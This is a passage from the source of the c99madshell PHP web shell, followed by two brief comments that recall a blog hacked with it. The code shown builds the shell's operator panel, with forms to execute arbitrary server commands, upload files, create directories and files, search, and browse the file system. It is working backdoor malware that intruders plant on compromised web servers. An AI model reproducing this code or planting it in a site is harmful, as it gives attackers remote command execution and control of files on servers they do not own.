<tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value=""><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>:: Select ::</b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> | |
<br> | |
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> | |
<tr> | |
<td width="50%" height="1" valign="top"><center><b>:: Search ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td> | |
<td width="50%" height="1" valign="top"><center><b>:: Upload ::</b><form method="POST" name="tod" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="file" name="uploadfile"><input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> | |
</tr> | |
</table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table> | |
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET, k1b0rg</u></b> </a> ]--</b></p></td></tr></table> | |
</body></html><?php chdir($lastdir); c99shexit(); ?> |
@antimatter15 posted a detailed analysis of this file and how he discovered his blog hacked back in 2014. It's hard to believe that it's still an effective hacking tool 9 years later.
Same. Either of you found out more?